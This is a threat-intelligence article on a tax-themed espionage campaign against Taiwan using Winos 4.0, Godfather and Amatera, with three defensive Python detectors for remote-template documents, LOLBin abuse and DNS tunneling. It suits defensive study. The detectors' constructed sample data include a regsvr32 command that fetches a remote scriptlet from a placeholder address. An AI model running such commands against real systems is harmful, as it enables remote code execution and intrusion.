Winos 4.0 and Godfather Trojan Deployed in Targeted Cyberespionage Campaign Against Taiwan
Taiwan has been the target of a coordinated cyberespionage campaign that deployed the Winos 4.0 malware framework and the Godfather banking Trojan. Both were distributed through waves of phishing emails built around tax-related themes, as disclosed in a June 2025 cyber threat briefing. The attacks, reportedly coordinated and persistent, are attributed to a state-sponsored threat group, most likely linked to China, seeking access to Taiwan's financial and governmental infrastructure.
The focus on fiscal institutions and public-sector databases indicates an intent to extract economic, personal, and governmental data. The additional use of an infostealer, Amatera, gave the operators a low-noise way to keep harvesting credentials and documents from compromised hosts over time.
Overview of the Attack Campaign
The campaign began in early May 2025 with emails crafted to appear to come from Taiwan's Ministry of Finance. The emails carried, or linked to, Microsoft Office documents weaponized either with VBA macros or with remote template injection. A macro document only runs when the recipient clicks "Enable Content"; a remote-template document contains no macro of its own, which defeats attachment scanners that look for VBA, and instead fetches a macro-enabled template from a URL recorded in its relationships part as soon as it is opened. Either path started the infection chain, which downloaded and executed the Winos 4.0 loader in the background.
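The remote-template trick described above leaves a static fingerprint: an OOXML relationship of type attachedTemplate whose Target is external. The following checker, added here as an illustration and not code from the briefing or any vendor, builds a constructed .docx-shaped zip (the URL, file names and the single-part layout are assumptions, not artifacts from the campaign) and then inspects it for that relationship and for an embedded vbaProject.bin part.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# OOXML relationship type naming a document's attached template; when the
# Target is external, Word fetches it from that URL at open time.
ATTACHED_TEMPLATE_REL = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def build_sample_docx(template_url=None, with_vba=False):
    """Constructed test fixture: a minimal .docx-shaped zip, not a real sample.

    template_url adds an external attachedTemplate relationship (remote
    template injection); with_vba adds a vbaProject.bin part (embedded macro).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        rels = ('<?xml version="1.0" encoding="UTF-8"?>'
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
        if template_url:
            rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE_REL}" '
                     f'Target="{template_url}" TargetMode="External"/>')
        rels += "</Relationships>"
        zf.writestr("word/_rels/settings.xml.rels", rels)
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic only
    return buf.getvalue()


def inspect_office_document(data):
    """Return static findings for an OOXML (docx/dotm/xlsx...) file given as bytes."""
    findings = {"remote_templates": [], "external_targets": [], "vba_project": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        findings["vba_project"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        for name in names:
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # relationships to internal parts are normal
                target = rel.get("Target", "")
                findings["external_targets"].append((name, target))
                if rel.get("Type") == ATTACHED_TEMPLATE_REL:
                    findings["remote_templates"].append(target)
    # Hyperlinks are External relationships too and are benign on their own,
    # so only the template and macro markers drive the verdict.
    findings["suspicious"] = bool(findings["remote_templates"]) or findings["vba_project"]
    return findings


if __name__ == "__main__":
    lure = build_sample_docx("http://203.0.113.10/tax/refund.dotm", with_vba=True)
    print(inspect_office_document(lure))
```

The same inspection applies to .dotm, .xlsx and .pptx files, since all share the OPC relationships layout; a mail gateway that unpacks attachments can run it before any Office process is involved.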
Simultaneously, researchers found evidence that the Godfather Trojan was delivered via fake tax refund notifications, which used localized language and government branding to lure unsuspecting users into downloading malicious APKs on mobile devices or executing Windows payloads.
Winos 4.0: A Stealthy and Modular Threat
Winos 4.0 is a modular Windows malware framework descended from Gh0st RAT and operated as a remote access trojan; information theft is one of its plugin capabilities rather than its only function. Analysis of samples retrieved from infected systems revealed:
- Process hollowing and in-memory execution of later stages, which defeats file-based antivirus scanning (behavioral EDR telemetry is still required to see it)
- Targeted data collection focused on browser cookies, VPN configurations, email credentials, and internal documentation
- Modular plugins for lateral movement, privilege escalation, and remote command execution
- Encrypted command-and-control (C2) channels carried over DNS and HTTPS, using a proprietary message format rather than standard web or DNS payloads
The malware’s architecture allowed operators to update and execute additional payloads, depending on the role and sensitivity of the victim’s machine.
The Godfather Trojan: Dual Targeting on Desktop and Mobile
While Godfather is primarily known as an Android banking Trojan, the briefing reports it being deployed in this campaign through both mobile and desktop vectors, targeting:
- Windows-based endpoints: Delivered through ZIP files and Office macros
- Android smartphones: Delivered through fake tax-related apps impersonating official financial tools
Once installed, Godfather performed keylogging, SMS interception, and overlay attacks against banking apps, in particular those of Taiwanese institutions. Harvested credentials and multi-factor authentication (MFA) codes, including SMS-delivered one-time passcodes, were sent to external servers believed to be operated from mainland China.
Amatera Infostealer: Silent Surveillance
Amatera, a lightweight but effective infostealer, was deployed after initial compromise to sustain collection on already-infected hosts. It specializes in:
- Exfiltrating cached credentials and clipboard data
- Harvesting documents with predefined keywords (e.g., “budget,” “defense,” “taxpayer”)
- Logging user behavior, including keyboard and mouse events
- Sending periodic system snapshots to attacker-controlled C2 infrastructure
The malware’s stealth and minimal footprint helped it remain undetected on many compromised systems for weeks, contributing to a longer dwell time and deeper access within organizational networks.
Targeted Sectors and Geopolitical Implications
The primary targets of this campaign included:
- Ministry of Finance and affiliated government departments
- Regional tax offices and national accounting systems
- Private financial institutions dealing in cross-border trade
- Technology firms with government contracts
The targeting of Taiwan’s financial infrastructure, especially during regional geopolitical tensions, suggests a broader agenda of strategic data acquisition, political leverage, and potential sabotage planning.
Security analysts believe this could be part of China’s larger cyberespionage strategy to monitor Taiwan’s economic activity, tax policies, and government personnel movements—information critical for both strategic influence and psychological operations.
Tactics, Techniques, and Procedures (TTPs)
The attackers employed the following TTPs:
- Spear-phishing with localized themes to increase open and click-through rates
- Multi-stage malware deployment involving dropper chains and sandbox evasion
- Living-off-the-land binaries (LOLBins) such as regsvr32 and rundll32, which proxy execution through signed Windows components so the payload runs under a trusted process name
- Command-and-control over DNS tunneling and over domains posing as content delivery networks
- Obfuscation and anti-analysis through encoded payloads and encrypted communications
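The LOLBin technique in the list above is detectable from ordinary process-creation telemetry. The rules below are an added example written for this page, not detection content from the briefing or from any product; the four log records are constructed, the pipe-separated key=value layout is an assumption (Sysmon Event ID 1 and most EDRs expose the same Image, ParentImage and CommandLine fields), and 203.0.113.10 is a documentation address.

```python
import re
from pathlib import PureWindowsPath

# Processes whose children should not be LOLBins when the lure is a document.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
# Directories an unprivileged user can write to; a DLL loaded from here by
# rundll32 is far more suspicious than one under System32.
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public|programdata)\\", re.I)

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\regsvr32.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "|CommandLine=regsvr32.exe /s /n /u /i:http://203.0.113.10/tax.sct scrobj.dll",
    "Image=C:\\Windows\\System32\\rundll32.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=rundll32.exe C:\\Users\\user\\AppData\\Local\\Temp\\update.dll,Start",
    "Image=C:\\Windows\\System32\\regsvr32.exe"
    "|ParentImage=C:\\Windows\\System32\\msiexec.exe"
    "|CommandLine=regsvr32.exe /s \"C:\\Program Files\\Vendor\\component.dll\"",
    "Image=C:\\Windows\\System32\\rundll32.exe"
    "|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
]


def parse_event(line):
    """Split one pipe-separated record into a field dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def _basename(path):
    return PureWindowsPath(path).name.lower()


def evaluate(event):
    """Return the list of rule names the event trips (empty if none)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    cmd_l = cmd.lower()
    hits = []
    # regsvr32 /i:<url> scrobj.dll executes a remote scriptlet ("Squiblydoo").
    if image == "regsvr32.exe" and ("/i:http" in cmd_l or "scrobj.dll" in cmd_l):
        hits.append("regsvr32_remote_scriptlet")
    # rundll32 running inline JavaScript or a DLL dropped in a user-writable path.
    if image == "rundll32.exe" and ("javascript:" in cmd_l or USER_WRITABLE.search(cmd)):
        hits.append("rundll32_suspicious_arguments")
    # An Office process spawning any LOLBin: the document-to-execution pivot.
    if parent in OFFICE_PARENTS and image in LOLBINS:
        hits.append("office_spawned_lolbin")
    return hits


def scan(lines):
    """Return [(index, [rule, ...]), ...] for events that trip at least one rule."""
    results = []
    for i, line in enumerate(lines):
        hits = evaluate(parse_event(line))
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(idx, rules, SAMPLE_EVENTS[idx].split("|")[-1])
```

The third and fourth records are the benign controls: regsvr32 registering a vendor DLL from Program Files under msiexec, and rundll32 opening Control Panel, both of which are routine and must not fire. Parent-child context is what separates the first record from legitimate regsvr32 use, which is why the Office-parent rule is kept separate from the command-line rules.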
Mitigation and Defensive Recommendations
Organizations in Taiwan—and globally—should implement the following countermeasures to mitigate similar threats:
- Disable Office macros by default, block macros in files downloaded from the internet, and enable Attack Surface Reduction rules such as "Block all Office applications from creating child processes"; enforce strict attachment scanning, including checks for remote template relationships
- Filter email using indicators from threat intelligence on this campaign (sender domains, attachment hashes, template URLs)
- Deploy endpoint detection and response (EDR) solutions capable of behavior-based anomaly detection
- Monitor DNS traffic for tunneling indicators: long, high-entropy subdomains, large numbers of unique subdomains under a single domain, and unusual volumes of TXT or NULL queries
- Train staff to recognize phishing themes tied to taxes, payroll, or government compliance
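To make the DNS monitoring recommendation concrete, the following profiler, an added example written for this page rather than a tool from the briefing, groups a constructed resolver log by apex domain and scores each group on subdomain uniqueness, length and Shannon entropy. The log lines, the cdn-sync.test and example.org names, the thresholds and the "last two labels are the registrable domain" shortcut are all assumptions; real deployments should use the Public Suffix List for the apex split.

```python
import math
from collections import defaultdict

BASE32_ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"


def shannon_entropy(s):
    """Bits per character of the string's empirical symbol distribution."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_query(qname):
    """Split a query name into (apex, subdomain).

    Assumption for brevity: the last two labels are the registrable domain.
    Production code should use the Public Suffix List (co.uk, com.tw, ...)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def profile_dns(lines, min_queries=5, min_unique_ratio=0.8,
                min_avg_sub_len=30, min_avg_entropy=3.5):
    """Flag apex domains whose subdomain traffic looks like encoded data.

    Each line is in the constructed form "<timestamp> <client> <qname> <qtype>"."""
    per_apex = defaultdict(list)
    for line in lines:
        _ts, _client, qname, qtype = line.split()
        apex, sub = split_query(qname)
        per_apex[apex].append((sub, qtype))

    flagged = {}
    for apex, entries in per_apex.items():
        if len(entries) < min_queries:
            continue
        subs = [s for s, _ in entries]
        unique_ratio = len(set(subs)) / len(subs)        # tunnels rarely repeat a chunk
        avg_len = sum(len(s) for s in subs) / len(subs)    # encoded chunks are long
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        txt_null_ratio = sum(q in ("TXT", "NULL") for _, q in entries) / len(entries)
        if (unique_ratio >= min_unique_ratio and avg_len >= min_avg_sub_len
                and avg_entropy >= min_avg_entropy):
            flagged[apex] = {
                "queries": len(entries),
                "unique_ratio": round(unique_ratio, 2),
                "avg_subdomain_len": round(avg_len, 1),
                "avg_entropy": round(avg_entropy, 2),
                "txt_null_ratio": round(txt_null_ratio, 2),
            }
    return flagged


def _encoded_chunk(i):
    """Constructed stand-in for a base32 data chunk: the i-th rotation of the
    alphabet split into two 16-char labels, so every query is unique and
    carries exactly 5 bits/char of entropy."""
    rot = BASE32_ALPHABET[i:] + BASE32_ALPHABET[:i]
    return rot[:16] + "." + rot[16:]


# Constructed resolver log: eight tunnel-like TXT queries under cdn-sync.test
# and ordinary A/MX lookups under example.org. Not real traffic.
SAMPLE_DNS_LOG = [
    f"2025-05-06T09:00:{i:02d} 10.0.0.21 {_encoded_chunk(i)}.cdn-sync.test TXT"
    for i in range(8)
] + [
    "2025-05-06T09:01:00 10.0.0.22 www.example.org A",
    "2025-05-06T09:01:05 10.0.0.22 www.example.org A",
    "2025-05-06T09:01:10 10.0.0.23 mail.example.org MX",
    "2025-05-06T09:01:15 10.0.0.23 mail.example.org A",
    "2025-05-06T09:01:20 10.0.0.24 api.example.org A",
    "2025-05-06T09:01:25 10.0.0.22 www.example.org A",
]

if __name__ == "__main__":
    for apex, stats in profile_dns(SAMPLE_DNS_LOG).items():
        print(apex, stats)
```

The example.org group has as many queries as the tunnel but repeats a handful of short names, so its uniqueness ratio stays at 0.5 and it is not flagged; content delivery networks and cloud load balancers do produce many unique subdomains, so in practice the flagged set should be reviewed against an allowlist of known CDN apexes rather than blocked outright.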
Cybersecurity coordination between public and private institutions is vital for early detection and response. TWCERT/CC and regional information-sharing alliances should continue correlating IOCs and alerting potential targets.
The Winos 4.0 and Godfather malware campaign against Taiwan exemplifies the evolving threat landscape in East Asia, where cyberespionage increasingly mirrors geopolitical strategy. State-sponsored actors are refining their tactics, using tax season and fiscal systems as vectors for broader surveillance and data exfiltration.
As Taiwan continues to modernize its digital infrastructure, the challenge will lie in strengthening its cyber resilience across all sectors—particularly those dealing with national finance, governance, and technology. This campaign serves as a stark reminder that cybersecurity must remain a top-tier national defense priority in an era of cross-domain digital warfare.